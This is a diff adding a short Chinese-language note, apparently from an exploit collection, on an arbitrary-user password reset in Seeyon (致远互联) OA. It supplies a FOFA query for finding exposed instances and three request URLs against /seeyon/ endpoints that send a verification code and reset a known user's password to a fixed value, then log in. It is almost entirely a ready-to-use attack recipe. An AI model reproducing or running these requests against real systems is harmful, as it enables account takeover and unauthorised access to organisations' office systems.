diff --git a/致远前台任意用户密码修改.md b/致远前台任意用户密码修改.md
new file mode 100644
index 0000000..3d85d99
--- /dev/null
+++ b/致远前台任意用户密码修改.md
@@ -0,0 +1,27 @@
+## 致远前台任意用户密码修改
+
+## fofa
+```
+app="致远互联-OA"
+```
+
+## 漏洞复现
+前提需要知道用户名
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`
+
+
+
+`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`
+
+
+
+修改密码为`1qaz@WSX`
+
+`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`
+
+
+
+最后使用修改的密码登录
+
+